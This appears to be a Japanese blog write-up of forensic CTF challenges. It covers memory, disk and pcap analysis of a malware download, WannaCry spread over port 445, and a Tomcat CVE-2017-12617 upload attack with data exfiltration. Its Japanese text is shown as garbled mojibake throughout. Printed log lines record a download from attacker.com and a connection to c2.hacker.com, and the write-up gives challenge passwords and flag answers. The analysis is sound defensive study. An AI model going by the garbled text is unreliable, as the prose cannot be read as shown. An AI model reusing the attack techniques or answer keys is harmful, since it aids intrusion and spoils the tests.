ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
GHDHWOPD
ï¼»åé¡ãã¡ã¤ã«ï¼½
Lab02.zip
ã¨ãããã¨ã§ãã£ã¦ããããã£ã¹ã¯ã¤ã¡ã¼ã¸ã¨ã¡ã¢ãªãã©ã¬ã³ã¸ãã¯ã¯éãããã ãmemãã¡ã¤ã«ãautopsyã«å
¥ãã¦ãããçµæã¯åºãªãã£ãã(CTFã®ãã©ã¬ã³ã¸ãã¯ã«ãããã¡ã¢ãªãã©ã¬ã³ã¸ãã¯ã¾ã¨ã [Volatility 3, Volatility 2])ãåèã«è§£æãã¦ãããã¨æãã
Volatility Foundationã¨ãããã¼ã«ãå©ç¨ããããã ã(Volatility3ãæ©é使ã£ã¦ã¿ã[追è¨])ãåèã«ããã
ââ# python3 vol.py -f './memdump.mem' windows.info
Variable Value
Kernel Base 0x8321e000
DTB 0x185000
Symbols file://./volatility3/symbols/windows/ntkrpamp.pdb/5B308B4ED6464159B87117C711E7340C-2.json.xz
Is64Bit False
IsPAE True
layer_name 0 WindowsIntelPAE
memory_layer 1 FileLayer
KdDebuggerDataBlock 0x83346be8
NTBuildLab 7600.16385.x86fre.win7_rtm.09071
CSDVersion 0
KdVersionBlock 0x83346bc0
Major/Minor 15.7600
MachineType 332
KeNumberProcessors 1
SystemTime 2017-10-15 14:52:45
NtSystemRoot C:\Windows
NtProductType NtProductWinNt
NtMajorVersion 6
NtMinorVersion 1
PE MajorOperatingSystemVersion 6
PE MinorOperatingSystemVersion 1
PE Machine 332
PE TimeDateStamp Mon Jul 13 23:15:19 2009
ã¨ããwindowsã®æ
å ±ãè¦ããã64bitã§ã¯ãªããããä»åã¯ä¸å¯©ãªããã»ã¹ãè¦ã¤ããã®ã§ã
- ããã»ã¹ããªã¼
- ç¾å¨å®è¡ä¸ã®ããã»ã¹ãã©ã®ãããªå¼æ°ã§å®è¡ãããã
- ãããã¯ã¼ã¯ã³ãã¯ã·ã§ã³
ã確èªãããã¨æããçµè«ããããã¯ã¼æ¥ç¶ãã¦ããã®ã§ããããè¦ã¦ããã
ââ# python3 ./vol.py -f ../memdump.mem windows.netscan.NetScan | grep "172.16.0.132"
0x391c9df8 100.0TCPv4 172.16.0.132 49831 192.168.100.50 3128 CLOSED 3276 iexplore.exe -
0x3a8b5008 TCPv4 172.16.0.132 49817 192.168.100.50 3128 CLOSED 3276 iexplore.exe -
0x3c0fadf8 TCPv4 172.16.0.132 49724 192.168.100.50 3128 CLOSED 3276 iexplore.exe N/A
0x3e05dcc0 TCPv4 172.16.0.132 49829 192.168.100.50 3128 CLOSED 3276 iexplore.exe -
0x3fcb1a28 TCPv4 172.16.0.132 49835 192.168.100.50 3128 ESTABLISHED 1308 services.exe -
0x3fcfddf8 TCPv4 172.16.0.132 0 192.168.100.50 0 CLOSED 3276 iexplore.exe -
0x3fd66370 TCPv4 172.16.0.132 49821 192.168.100.50 3128 CLOSED 3276 iexplore.exe -
ãããESTABLISHEDã«ãªã£ã¦ããPIDãé¸æããã°çµäºãããã§ç¥ã£ã¦ããããã®ã¯ã¡ã¢ãªãã©ã¬ã³ã¸ãã¯ã¯Volatility3ãã§ããFKTimagerã¨ããã®ã使ãããããªã®ã§ãæ©ä¼ãããã°ã
[Lab03] ã¿ã¤ã ã©ã¤ã³è§£æ
100
ï¼»åé¡ï¼½
ããªãã¯ãä¸å¯©ããã»ã¹ãèµ·åããåå ï¼ææããåå ï¼ã調æ»ãããããã¿ã¤ã ã©ã¤ã³è§£æãå®æ½ãã¾ããã
ã©ããããæåã«å®è¡ããããã¦ã³ãã¼ããããã«ã¦ã§ã¢æ¬ä½ããã¦ã³ãã¼ããå®è¡ãããã¨ã§ãä¸å¯©ãã¹ãã¨ã®éä¿¡ãéå§ãããããã§ãããã¦ã³ãã¼ãã®ãã¡ã¤ã«åãç¹å®ãã¦ãã ããã
ï¼»è£è¶³ï¼½
ã»åé¡ãã¡ã¤ã«ã¯ãçä¼¼ãã£ã¹ã¯ã¤ã¡ã¼ã¸ã§ãããã¡ã¤ã«ã·ã¹ãã ã¬ãã«ã§è§£æããã¨æ´åæ§ãã¨ããªãé¨åãããã¾ãã®ã§ãäºããäºæ¿ãã ããã
ã»ãè«æ±æ¸.exeãã¯éå»ã®ææã®æ®éª¸ã§ãããä»åã®ã¤ã³ã·ãã³ãã¨ã¯ã¿ã¤ã ã©ã¤ã³ãã¤ãªãã£ã¦ãã¾ããã
ã»plaso 1.5.1ãã¨ã©ã¼ã«ãªãå ´åã¯ãplaso-20170930 (Heimdall)ãã試ããã ããã
ï¼»ãã©ã°ï¼½
ãã¦ã³ãã¼ãã®ãã¡ã¤ã«åï¼åè§ãå°æåï¼
ä¾ï¼xyz.doc.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
YUCQKSGE
ï¼»åé¡ãã¡ã¤ã«ï¼½
Lab03.zip
ã¨ããããã§ããã£ã¹ã¯ã¤ã¡ã¼ã¸ã渡ããããä¹
ãã¶ãã®åæãè¡ãã
ââ# file diskimage.dd
diskimage.dd: DOS/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS ", sectors/cluster 8, Media descriptor 0xf8, sectors/track 63, heads 128, hidden sectors 1, dos < 4.0 BootSector (0x80), FAT (1Y bit by descriptor); NTFS, sectors/track 63, sectors 614399, $MFT start cluster 25600, $MFTMirror start cluster 2, bytes/RecordSegment 2^(-1*246), clusters/index block 1, serial number 0763839383838f927; contains bootstrap BOOTMGR
NTFSãã¡ã¤ã«ã·ã¹ãã ãè¦ãã®ã¯picoCTFã°ãããã£ã¦ããã®ã§æ°é®®ãåãããã«è¡ããã®ã ãããã
ââ# mmls diskimage.dd
mmls
ã³ãã³ãã¯åå¿ãªããautopsyã«æãã¦ã¿ãã
åé¡æã®ãã³ãã¨ãã¦ã¯
- ãã¦ã³ãã¼ã
- å®è¡
- ãã¡ã¤ã«å
ãããããããã¼ã¯ã¼ãã®ããã«æããautopsyã¨(ã»ãã¥ãªãã£TIPSããããå³ä¸æ£ã¢ã¯ã»ã¹å¯¾å¿ RDPç·¨)ãåèã«ã$LogFileã$MFTãNTUSER.DATã¨SYSTEMãæ½åºãããprefetchã ãã§ãåºã¦ãããã ããããããè¦ã¦ã¿ãã
ã¶ã£ã¡ããã©ããè¦ã¦ããã®ããããã«ãããæ
£ãã¦ãªããããï¼systemã¨NTUSER.DATãå
¥ãã¦ã¿ããã©ããªã«ãè¦ãã°ãããããããããä¿çã
ä¸å¿ãè¦ãããã®ãè¦ããç°å¢ã«ã¯ã§ããããã¨ã¯æ¢ãã ãã (åãã¦ã®ãRegistry Viewerã)ã(æè¿éãããã¡ã¤ã«ã調æ»ãããï¼ãRecent Filesç·¨ã)
(ãã«ã¦ã§ã¢ææ対å¿
ãã©ã¬ã³ã¸ãã¯åºç¤ç·¨)ãããããè¦ã¦ããããprefetchãä¸çªè¦ã¤ãããããã
ããããæ
å ±ã足ããªããããå°ãã¬ã¸ã¹ããªãªã©è¦ã対象ã§ä½ãåããã®ããè¦ãã¦ããæãã
ãããã調ã¹ãããSANSã®è³æãä¸çªããæ°ããããããã§ãä½ãææããã«è¦ã¦ããã°ãããããããªãã
ããã§ãä»åã®ctfã¯æµãããããã¨ãæãåºããã1ã§ã¯é¢é£ããIPã¢ãã¬ã¹ãè¦ã¤ãããââ# cat access.log |grep c2.hacker.com
15/Oct/2017:23:55:04 +0900.236 332380 172.16.0.132 TCP_MISS/200 722088 CONNECT c2.hacker.com:443 - DIRECT/192.168.15.10 - "-"
ã¾ããæå»ã大ä½ãåããã
次ã®2ã§ã¯PIDãæ±ããã0x3fcb1a28 TCPv4 172.16.0.132 49835 192.168.100.50 3128 ESTABLISHED 1308 services.exe -
ããã§ãservices.exeãå®è¡ãããä¸å¯©ãªæåã示ããã¨ãåããããããææããã«ãã¦ã¿ãã
prefetch確èªã
ã¤ã¾ããSERVICES.EXEããåã«ãã¦ã³ãã¼ãã¯ããã¨ããããSERVICES.EXE \DEVICE\HARDDISKVOLUME1\USERS\USER01\DESKTOP\INVOICE\SERVICES.EXE 5
ããã調ã¹ãã¨DESKTOP\INVOICEã®ä¸ã®service.exeãå®è¡ããã¦ããããã®invoiceãéµãªã®ã ãããã
INVOICE.EXEã詳ããè¦ãã¨ãã®ãã¨ã«SERVICE.EXEãå®è¡ããã¦ãããåæ©ã¯ä¸æ確ã ããã®INVOICE.EXEããã¦ã³ãã¼ãã ã¨èããå
¥åãæ£è§£ã
100
ï¼»åé¡ï¼½
ãã¦ã³ãã¼ãã¯ãããä¸å¯©ãµã¤ããããã«ã¦ã§ã¢æ¬ä½ããã¦ã³ãã¼ãããããã§ãã
ãããã·ãã°ã¾ãã¯ãã«ã¦ã§ã¢æ¤ä½ã®è§£æã«ããããã¦ã³ãã¼ããã¢ã¯ã»ã¹ããä¸å¯©ãµã¤ãã®URLãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ä¸å¯©ãµã¤ãã®URLï¼åè§ï¼
ä¾ï¼http://abc.example.com
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
IVDLECEL
ã¨ãããã¨ã§ããã¦ã³ãã¼ãããããã«ã¢ã¯ã»ã¹ä¸ä¸å¯©ãµã¤ããç¹å®ããããã ãaccess.logãããservice.exeã®å®è¡æéããã¨ã«èããã¨
ââ# cat access.log |grep 23:49:21
15/Oct/2017:23:49:21 +0900.782 4 172.16.0.132 TCP_MISS/200 6586 GET http://www.attacker.com/a.exe - DIRECT/192.168.15.200 application/octet-stream "wininet"
15/Oct/2017:23:49:21 +0900.852 3 172.16.0.147 TCP_DENIED/400 1586 NONE error:unsupported-request-method - NONE/- text/html "-"
ã¨ãªããURLãè¦ãããå
¥åãæ£è§£ã®ããã ã
ãã£ãããªã®ã§ãæ¤ä½ã®è§£æãè¡ããââ# strings Invoice.exe
ããã£ã¦ããç´æ¥çã«ã¯åºã¦ããªããghidraããªï¼
解æãã¦ã¿ããã©ãé£ããããã ãåçã«è§£æããªãã¨ãããªããããªã®ã§ãã¾ãã®æ©ä¼ã«ã
[Tri01] NSAã®æ»æãã¼ã«
50
ï¼»åé¡ï¼½
2017å¹´5æã«ä¸çä¸ã§ææ被害ãçºçããã©ã³ãµã ã¦ã§ã¢ãWannaCryãã¯ããããã¯ã¼ã¯çµç±ã§æææ¡å¤§ããããã«ãNSAããæµåºããæ»æãã¼ã«ã®ã²ã¨ã¤ãæªç¨ãã¦ãã¾ãã
ãWannaCryããæªç¨ãã¦ããæ»æãã¼ã«ã®ã³ã¼ããã¼ã ãçãã¦ãã ããã
ï¼»ãã©ã°ï¼½
æ»æãã¼ã«ã®ã³ã¼ããã¼ã ï¼åè§ã¢ã«ãã¡ãããå°æåï¼
ä¾ï¼heartbleed
(WannaCryã¯åºç« ï¼ãNSAãã¼ã«ãæªç¨ãããã«ã¦ã§ã¢ãç¸æ¬¡ãåºç¾)ãåèã«ããã
[Tri02] é»åã¡ã¼ã«è©æ¬º
50
ï¼»åé¡ï¼½
ã½ã¼ã·ã£ã«ã¨ã³ã¸ãã¢ãªã³ã°ãé§ä½¿ããé»åã¡ã¼ã«ãéä¿¡ãã¦ãä¼æ¥ã«ééãããè©æ¬ºè¡çºã®ãã¨ãæå³ããã¢ã«ãã¡ãããï¼æåãçãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ï¼æåã®ã¢ã«ãã¡ãããï¼åè§å¤§æåï¼
ä¾ï¼XYZ
(ãã¸ãã¹ã¡ã¼ã«è©æ¬ºï¼BECï¼ã®æå£ã¨ã¯ï¼å¹æçãªå¯¾çã»å¯¾å¦æ³)ãåèã«ããã
2018
Net.1 å·¥å ´ç¨PCã®èª¿æ»
100
ï¼»ã·ããªãªï¼½
ããæ¥ãå·¥å ´ç¨PCå
ã®1å°ã«å°å
¥ããã¦ããã¦ã£ã«ã¹å¯¾çã½ãããããWannaCryããã®æ»æãæ¤åºããã¨ããè¦åãåºã¾ããã
ãã®ç¿æ¥ãå¶æ¥é¨ã®æ
å½è
ããã社å
ã¦ã§ããæ¸ãæãããã¦ããã®ã§ã¯ãªãããã¨ããé£çµ¡ãå
¥ã£ã¦ãã¾ããã
ããªãã¯ãé大ãªã¤ã³ã·ãã³ããçºçãã¦ããã®ã§ã¯ã¨èããäºã¤ã®ã¤ã³ã·ãã³ãã«ã¤ãã¦èª¿æ»ãè¡ããã¨ã«ãã¾ããã
å·¥å ´å
LANã¯ãã¤ã³ã¿ã¼ãããã«ã¯æ¥ç¶ããã¦ããããé絶ããããããã¯ã¼ã¯ã®ããã幸ãäºã¤ã®ã¤ã³ã·ãã³ãã«é¢é£ã¯ãªãããã§ãã
å·¥å ´ç¨PCã§ã®ã¤ã³ã·ãã³ãã«ã¤ãã¦èª¿æ»ãè¡ã£ãã¨ãããæ©å¨ã®ç¹æ¤ã®ããã«ä»ä¼ç¤¾ã®ç¤¾å¡ãæã¡è¾¼ãã§ããPCãåå ã§å·¥å ´å
PCã®ã©ãããææããããã ã¨æããã¾ããããWannaCryæææã«è¡¨ç¤ºããã身代éæ¯æãç»é¢ã¯ã©ã®PCããã確èªããã¦ããããæ¬å½ã«WannaCryã«ææãã¦ããã®ãä¸æã§ãã
ãã±ããä¸ãããææãæ¡å¤§ããããã¨ãã¦ããåããè¦åããããææ端æ«ã1å°è¦ã¤ãåºãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ææ端æ«ã®IPã¢ãã¬ã¹ï¼åè§ï¼
ä¾ï¼192.168.11.1
ï¼»åé¡ãã¡ã¤ã«ï¼½
Network01.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
846953608FECA964145540C323CBC6A8
pcapãã¡ã¤ã«ã渡ããããåé¡æããã横å±éãããã¨ãã¦ãããã±ãããè¦ã¤ããã®ã ãããï¼
ãã¤ãéããã¾ãã¯é層ããè¦ã¦ãããIPv6ããIPv4ã§ã®éä¿¡ãå¤ããã¾ããUDPããTCPã®æ¹ãå¤ããSMBãããã³ã«ãå¤ãããªã«ãèãããã¨ãããã®ã§ããã§ãã¯ãã¦ããã
IPv4ã«æ³¨ç®ããæãéä¿¡ãã±ãããå¤ãã10.10.10.7ã¨10.10.10.5ãæ°ã«ãªãã
SMBãããã³ã«ã§æ¤ç´¢ããæã®é層ã§ããã10.10.10.2ã®éä¿¡ãå¤ããã¨ãåããã
ãã¦ãã»ãã®èãæ¹ããã¦ã¿ããwannacryç¹æã®æææ¡å¤§æ¹æ³ã¯ãªãã®ã ãããï¼(WannaCryã¨ã¯ï¼ä»çµã¿ã¨ææçµè·¯ãææ確èªæ¹æ³ã対çãç´¹ä»)ãåèã«ããã¨ãããã¡ã¤ã¢ã¦ã©ã¼ã«ã®ãã°ã«WannaCryãä¾µå
¥ã«ä½¿ç¨ãããã¼ã445ã¸ã®æ¥ç¶ãè¨é²ããã¦ããªãããªã©ã確èªãã¾ãããããã¨ãããwannacryã¯445ãã¼ãããã¢ã¯ã»ã¹ããããã ã
tcp.dstport ==445
ã§æ¤ç´¢ããã®ã¡ã«é層ãè¦ã¦ã¿ãã
10.10.10.7ã¨10.10.10.4ãããããããããã£ã¦ãã10.10.10.7ãæµã¨èãããããflagã²ããã
Net.2 æ»æå
ã®ç¹å®
100
ã¦ã§ãæ¹ããã®ã¤ã³ã·ãã³ãã«ã¤ãã¦èª¿æ»ãè¡ã£ãã¨ãããæ»æè
ã«ããTomcatãµã¼ãã¼ã®èå¼±æ§ã«å¯¾ãæ»æããªãããæ
å ±ãæã¡åºããã模æ§ã§ãã
æ»æå
ã®IPã¢ãã¬ã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
æ»æå
ã®IPã¢ãã¬ã¹
ä¾ï¼203.0.113.109
ï¼»åé¡ãã¡ã¤ã«ï¼½
Network02.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
3A5FB7C5E66F1189127588E1AD3278B7
ã¨ãããã¨ã§ã次ã®åé¡ãã¦ã§ãæ¹ãããè¡ãããããã ãTomcatãµã¼ãã¼ã®èå¼±æ§ãå©ç¨ãããããã ã
(Apache Tomcat ã«æ
å ±æ¼ããã®å¯è½æ§ãããèå¼±æ§ãOpenSSL ã«æ·±å»åº¦ãé«ãã®èå¼±æ§ãçºè¦ãããï¼ãã®å¯¾å¦æ³ã¨ã¯ï¼)ãããå®éã«èå¼±æ§ããã£ãããã ã
HTTPéä¿¡ãèµ·ãã£ã¦ããã
ãã±ããã®éåä¿¡ã¯ãããªæãã
HTTPã§ã¯å¹³æã§éä¿¡ããã¦ããã®ã§ããããæ
å ±æ¼æ´©ã«ãªã£ã¦ããã®ã ãããï¼ã¤ã¾ãããã®ãã±ããã®dstãæ»æå
ã ãããï¼ãããã§ããã»ãã®ãã®ãåãåã£ã¦ããã®ã§ããã ãã§ã¯ç¹å®ã§ããªãã
192.168.100.106ã¨ãã®ä»ãéä¿¡ãã¦ãããä¸å¯©ãªãªã¯ã¨ã¹ããéããã¨ã§æ
å ±ãæ¼æ´©ãã¦ãã¾ããããªã®ã§ã192.168.100.106ã«å¯¾ãããªã¯ã¨ã¹ããè¦ãã
çãä¸ãã¸ãã®pwnãªãã¡ããã®å¾ããæªããããããä¸æ¯ãããå
¥åãæ£è§£ã(Apache Tomcat ã«ãããä¾å¤å¦çã«é¢ããæ
å ±æ¼ããã®èå¼±æ§)ãã©ã¡ã¼ã¿å¦çã«é¢ãã¦ã®èå¼±æ§ãããããã
100
DMZå
ã®ã¦ã§ããµã¼ãã¼ã§åä½ããApache Tomcatã«å¯¾ããå¤é¨ããæ»æãè¡ããã¦ãããã¨ãçºè¦ãã¾ããã
ãããã¯ã¼ã¯ã®ãã°ãããæ»æã«ä½¿ãããèå¼±æ§ãç¹å®ãã¦ãã ããã
ãªããåé¡ãã¡ã¤ã«ã¯ãNetwork 2 ã«æ·»ä»ããã¦ãããã®ã使ãã¾ãã
ï¼»ãã©ã°ï¼½
使ç¨ãããèå¼±æ§ã®CVEçªå·
ä¾ï¼CVE-2017-11882
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
3A5FB7C5E66F1189127588E1AD3278B7
(Apache Tomcatã«å«ã¾ããèå¼±æ§(CVE-2017-12617)ã«é¢ããèå¼±æ§æ¤è¨¼ã¬ãã¼ã)ãåèã«ãããPUTã§ç¸æã«ä»»æã®ã³ã¼ããéãä»ãããã®å¾ããããå®è¡ãããããªãã©ã¡ã¼ã¿ãéä¿¡ãããã¨ã§ã§ããããã ã
Net.4 æ
å ±æµåºå
容ã®ç¹å®
300
Tomcatã®èå¼±æ§ãè¶³å ´ã«ãã¦ãã«ã¦ã§ã¢ãè¨ç½®ãããå¤é¨ã«æ
å ±ãæµåºãã¦ããããã§ãã
æµåºããæ
å ±ãç¹å®ãããã®ä¸ã«å«ã¾ãããã©ã°ãè¦ã¤ãã¦ãã ããã
ãªããåé¡ãã¡ã¤ã«ã¯ãNetwork 2 ã«æ·»ä»ããã¦ãããã®ã使ãã¾ãã
ï¼»ãã©ã°ï¼½
次ã®å½¢å¼ã®æåå FLAG_xxxxxxxxxx
ä¾ï¼FLAG_ThisIsFlag
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
3A5FB7C5E66F1189127588E1AD3278B7
ã ããã§ããæåæ¤ç´¢ã§FLAG_ã¨ãã¦ãåºã¦ããªãããã®ã¾ã¾éä¿¡ãã¦ããã¨ããããã§ã¯ãªããããåãã¦ãããã¨ã³ã³ã¼ãããã¦ãããã
ã¾ããå
ã®åé¡ã§52.78.222.102ããã«ã¦ã§ã¢ãè¨ç½®ããã¨èãããããNo.3134ãTime12:57:01.425171ã®ãã¨ã®ãã±ããã ã¨å¤æã§ããããã±ãããè¦ã¦ããã¨3567 12:57:56.860854 192.168.100.106 101.51.222.228 HTTP 2136 HTTP/1.1 200 OK (image/x-icon)
ã¨ãã¦ç»åã渡ããã¦ãããã¨ãã»ãã«ã¯ä½ãããã®æ©å¯æ
å ±ãtextã§æ¸¡ããã¦ããã®ã確èªãããç»åããã¾ã§ããææãããªããã¡ãã£ã¨å
¨ããããããå¾æ¥ã
(ä»å°CTF2018 Net.4 æ
å ±æµåºå
容ã®ç¹å® 300)WriteUpãè¦ãã
æµãã¨ãã¦ã¯ã52.78.222.102ã3111ãã±ããã§GETãªã¯ã¨ã¹ãã®ãããªä»»æã®ã³ã¼ããå®è¡ãã¦ããããã®ãã¨ã«ãã®å®è¡ã«é¢ããæ
å ±ãTCPã§éããã¦ããã¨ãã£ãæãã®ããã ã
3116,3124,3129ã§ãã¼ã¿ãåå²ãã¦éããã¦ããããã ã3116ã®ãã¼ã¿ã®æåãPKã¨ãªã£ã¦ããããããzipå½¢å¼ã®ãã¸ãã¯ãã³ãã¼ã¨ç¥ããªãã£ãã®ã§è§£ãã®ã¯é£ããã£ãã ããã
åå²ãã¦éããã¦ãããã¼ã¿ãä¸ã¤ã«ããã
from scapy.all import *
p = rdpcap('./Network02.pcap')
load = []
for i in [3116,3124,3129]:
i=i-1
load.append(p[i]['Raw'].load)
load = b''.join(load)
with open("load.zip", 'wb') as f:
f.write(load)
ãå®è¡ããã¨æ½åºã§ãããPKãzipãªã®ã§ãunzipãããããããã¨ã[Content_Types].xml, _relsãã©ã«ã, xlãã©ã«ããåºã¦ããããããå
¨ããããããã°ã°ã£ã¦ã¿ã(Excelãã¡ã¤ã«æä½ãããã°ã©ãã³ã°ããåã«ãã¾ãã¯xlsxãzipã«å¤ãã¦å
é¨æ§é ãè¦ã¦ã¿ãã)ãåèã«ããã¨ãã¤ã¾ãããã®ä¸èº«ã¯xlsxå½¢å¼ã®Ecelããããpptxã解åã§ããããã«xlsxã解åã§ããããã ãã¤ã¾ããload.zipã§æ½åºãããã®ã¯load.xlsxã§ãã£ãã¨ãããã¨ãåãã£ããæ¡å¼µåãå¤æ´ãã¦ã¿ã¦ã¿ãã¨flagãããçµäºã
For.1 ãã¦ã³ãã¼ãå
URLã®ç¹å®
100
ï¼»ã·ããªãªï¼½
ããæ¥ãå¶æ¥æã®ç¤¾å¡ï¼user01ï¼ãå©ç¨ãã¦ãããã½ã³ã³ã§ãã¦ã¤ã«ã¹å¯¾çã½ããã®ã¹ã±ã¸ã¥ã¼ã«ã¹ãã£ã³ï¼æ¯é±ï¼åãèªåçã«ï¼¨ï¼¤ï¼¤å
¨ä½ãã¦ã¤ã«ã¹ã¹ãã£ã³ãããã®ï¼ã«ãããFirefoxã®ä¸æãã©ã«ãã«ä¿ç®¡ããã¦ãããã¡ã¤ã«ãããã«ã¦ã§ã¢ã¨ãã¦æ¤ç¥ãã¾ããã
ããªãã¯ãæ¤ç¥ãããã¡ã¤ã«ï¼æ¤ä½ï¼ã¯ãã©ããã®ã¦ã§ããµã¤ããããã¦ã³ãã¼ããããå¯è½æ§ãé«ãã¨èãã調æ»ãããã¨ã¨ãã¾ããã
æ¤ä½ã解æãããã¦ã³ãã¼ãå
URLãç¹å®ãã¦ãã ããã
ï¼»æ¤ç¥ãããã¡ã¤ã«ï¼½
ãã©ã«ãåï¼C:\Users\user01\AppData\Local\Mozilla\Firefox\Profiles\o5j56hgo.default\cache2\entries
ãã¡ã¤ã«åï¼E0274DBC37EC05DA0813E93E7A1C3260C93BE6DE
ï¼»ãã©ã°ï¼½
æ¤ä½ãE0274DBC37EC05DA0813E93E7A1C3260C93BE6DEãã®ãã¦ã³ãã¼ãå
ã®URLï¼åè§ãå°æåï¼
ä¾ï¼http://www.sendai-ctf.org/abc.exe
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
2037B95D868C68200E054A012B8AB18B
ï¼»è£è¶³ï¼½
åé¡ãã¡ã¤ã«ã¯ã»ãã¥ãªãã£å¯¾çã½ããã¨ãã¦å¤å®ãããå¯è½æ§ãããã¾ããã模æ¬ãã«ã¦ã§ã¢ã§ãããå®å®³ã®ããåä½ã¯ãããã¾ããã
ã¨ãããã¨ã§ä½ãããã®ãã¡ã¤ã«ã渡ããããåæè¡ãã
ââ# file E0274DBC37EC05DA0813E93E7A1C3260C93BE6DE
E0274DBC37EC05DA0813E93E7A1C3260C93BE6DE: PE32 executable (GUI) Intel 80386, for MS Windows, 3 sections
å®è¡ãã¡ã¤ã«ã®ããã ãstrings
ã³ãã³ããå®è¡ããããããURLããã£ãã®ã§å
¥åãæ£è§£ã ã£ãããã£ã¨ã¡ããã¨è§£ãã¹ãã§ããã
For.2 å®è¡å±¥æ´ã®èª¿æ»
100
æ¤ç¥ãããã¡ã¤ã«ã®ãã¦ã³ãã¼ãå
URLã¯ãæåãªããªã¼ã½ãããPC-Cleanerãï¼æ³¨è¨ï¼æ¶ç©ºã®ããªã¼ã½ããï¼ã®å
¬å¼ãµã¤ãã®ããã§ãã
ãPC-Cleanerãã®å
¬å¼ãµã¤ãã確èªããã¨ãããä¸æ£ã¢ã¯ã»ã¹è¢«å®³ã«éãããã«ã¦ã§ã¢ãæ··å
¥ãããããã°ã©ã ãPC-Cleaner.exeããé
å¸ãããã¨ãããè©«ã³ææ¸ãæ²è¼ããã¦ãã¾ããã
社å¡ï¼ä»¥ä¸user01ã¨ããï¼ã«ç¢ºèªããã¨ããããã¦ã³ãã¼ããããPC-Cleaner.exeããå®è¡ãããè¨æ¶ãå®ãã§ã¯ãªããããããå®è¡ãã¦ããã¨ãã¦ããããã«åé¤ããã¯ãã ã¨è¨¼è¨ãã¦ãã¾ãã
ããªãã¯ãuser01ã®ãã½ã³ã³ã¯ãã«ã¦ã§ã¢ã«ææãã¦ããå¯è½æ§ãé«ãã¨èãããã½ã³ã³ããããã¯ã¼ã¯ããéé¢ããããã§ãããã¤ãã®ãã¡ã¤ã«ãã¨ããã³ã¹ã¨ãã¦è¨¼æ ä¿å
¨ãã¾ããã
user01ã®ãã½ã³ã³ãã証æ ä¿å
¨ããã¨ããã³ã¹ã解æãããPC-Cleaner.exeããå®è¡ãããæ¥æãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ããªã¼ã½ãããPC-Cleaner.exeãã®å®è¡æ¥æ
ï¼YYYY/MM/DD-hh:mmï¼ï¼åè§ï¼
ä¾ï¼2018/11/10-23:59
ï¼»åé¡ãã¡ã¤ã«ï¼½
forensic02.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
49FE1EC08DE97ED1F97D7551EAAED466
ã¨ãããã¨ã§ãprefetchã渡ããããwinprefetchwiewerã§ç¢ºèªãfindã§Cleaner.exeã¨èª¿ã¹ããåºã¦ããã
100
調æ»ã«ããã社å¡ï¼ä»¥ä¸ãuser01ã¨ããï¼ã®ãã½ã³ã³ã¯ããã«ã¦ã§ã¢ãæ··å
¥ããããªã¼ã½ãããå®è¡ãã¦ãããã¨ã確èªããã¾ããã
ããªã¼ã½ãããPC-Cleanerãï¼æ³¨è¨ï¼æ¶ç©ºã®ããªã¼ã½ããï¼ã«æ··å
¥ãããã«ã¦ã§ã¢ã«ã¤ãã¦ãã»ãã¥ãªãã£ç 究è
ã®ããã°ãªã©ã§æ
å ±åéããã¨ããããã¦ã³ãã¼ãã¼ã¨ãã種é¡ã®ãã«ã¦ã§ã¢ã§ãããä»ã®ãã«ã¦ã§ã¢ï¼ä»¥ä¸ããã«ã¦ã§ã¢ï¼¢ã¨ããï¼ããã¦ã³ãã¼ãããæ©è½ãæãã¦ããããã§ãã
ãã«ã¦ã§ã¢ï¼¢ã¯ãå®è¡ãããã¨ããã½ã³ã³ã®ãããã©ã«ãã«èªèº«ãã³ãã¼ããã¨ã¨ãã«ããã½ã³ã³ã®ãã°ãªã³æã«èªåçã«å®è¡ãããããã¬ã¸ã¹ããªãæ¹å¤ããããã§ãã
ããªãã¯ãuser01ã®ãã½ã³ã³ã«æ½ä¼ãã¦ãããã«ã¦ã§ã¢ï¼¢ã®æ¤ä½ãã¦ã¤ã«ã¹å¯¾çã½ããã®éçºå
ã«éä»ãããã¿ã¼ã³ãã¡ã¤ã«ã®ä½æãä¾é ¼ããå¿
è¦ãããã¨èãã¾ããã
user01ã®ãã½ã³ã³ãã証æ ä¿å
¨ããã¨ããã³ã¹ã解æãããã°ãªã³æã«èªåå®è¡ããããã«ã¦ã§ã¢ï¼¢ã®ãã«ãã¹ãç¹å®ãã¦ãã ããã
ï¼»ãã©ã°ï¼½
ãã°ãªã³æã«èªåå®è¡ããããã«ã¦ã§ã¢ï¼¢ã®ãã«ãã¹ï¼åè§ï¼
ä¾ï¼C:\Windows\abc.exe
ï¼»åé¡ãã¡ã¤ã«ï¼½
forensic03.zip
ï¼»åé¡ãã¡ã¤ã«ã®ãã¹ã¯ã¼ãï¼½
CC4016A040C38B6F8CBCF308058B7AAD
ã¨ãããã¨ã§ãUSER(NTUSER.DAT)ãã£ã¬ã¯ããªãWindows(prefetch)ãã£ã¬ã¯ããª,ã$MFTã渡ãããã
ãã°ãªã³æã«å®è¡ãããã¨ããã®ãèã«ãªãããã
- prefetchããPC-CLEANER.EXEã®å¾ã«å®è¡ããããã®ãåããã
ç¥è(ï¼MFT)
$MFT
(ãã¹ã¿ã¼ãã¡ã¤ã«ãã¼ãã«ã¨ã¯ãç¨èªé詳細ã)ãåèã«ãããããã¹ã¿ã¼ãã¡ã¤ã«ãã¼ãã«ï¼Master File TableãMFTï¼ã¯ãWindowsãæ¡ç¨ãã¦ããNTFSï¼NT File Systemï¼ã«ããã¦ãã·ã¹ãã å
